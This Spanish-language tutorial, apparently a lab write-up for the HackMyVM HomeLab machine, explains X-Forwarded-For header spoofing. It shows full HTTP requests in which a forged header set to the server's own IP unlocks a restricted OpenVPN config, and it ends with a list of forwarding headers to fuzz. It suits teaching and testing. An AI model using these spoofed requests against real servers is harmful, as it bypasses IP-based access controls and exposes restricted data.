¿Qué es X‑Forwarded‑For header spoofing?
El X‑Forwarded‑For (XFF) header spoofing consiste en que un cliente (o un actor intermedio) falsifica la cabecera HTTP X-Forwarded-For para hacer creer al servidor o a la aplicación que la petición proviene de otra dirección IP. El ataque tiene éxito cuando el servidor confía en esa cabecera para tomar decisiones de seguridad, como permitir o denegar el acceso, aplicar listas blancas o negras, registrar el origen o imponer geobloqueo.
Ejemplo de ataque (máquina HomeLab de HMV)
Request:
GET /service/ HTTP/1.1
Host: 10.207.245.123
Cache-Control: max-age=0
Accept-Language: es-419,es;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-aliveResponse:
HTTP/1.1 200 OK
Date: Sun, 09 Nov 2025 17:58:39 GMT
Server: Apache/2.4.62 (Unix)
X-Powered-By: PHP/8.4.5
Content-Length: 59
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain;charset=UTF-8
Whoa! But sorry, this service is only available for myself!Pero si añadimos la cabecera X‑Forwarded‑For con la propia IP del servidor:
GET /service/ HTTP/1.1
Host: 10.207.245.123
X-Forwarded-For: 10.207.245.123
Cache-Control: max-age=0
Accept-Language: es-419,es;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: keep-aliveResponse:
HTTP/1.1 200 OK
Date: Sun, 09 Nov 2025 17:59:50 GMT
Server: Apache/2.4.62 (Unix)
X-Powered-By: PHP/8.4.5
Content-Length: 326
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# on 2024-12-21
# Example Configuration File
client
dev tun
proto udp
remote ? ?
resolv-retry infinite
nobind
persist-key
persist-tun
ca ?
cert ?
# Regenerate a STRONG password for the KEY
# Do NOT use a SAME password as other services et. SSH
# it is DANGEROUS!
key ?
cipher AES-256-GCM
verb 3Al confiar en la IP declarada en X-Forwarded-For, el servidor cree que la petición proviene de sí mismo y entrega el contenido restringido (en este caso, un archivo de configuración de OpenVPN).
Listado de cabeceras
Cuando una cabecera es ignorada, conviene probar variantes y sinónimos: distintos servidores y proxys interpretan nombres diferentes. Estas son cabeceras útiles para fuzzear el origen de la petición:
Forwarded
Forwarded-For
Forwarded-For-Ip
Forwarded-Proto
Max-Forwards
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Originally-Forwarded-For
X-Originally-Forwarded-Proto
X-Sakura-Forwarded-For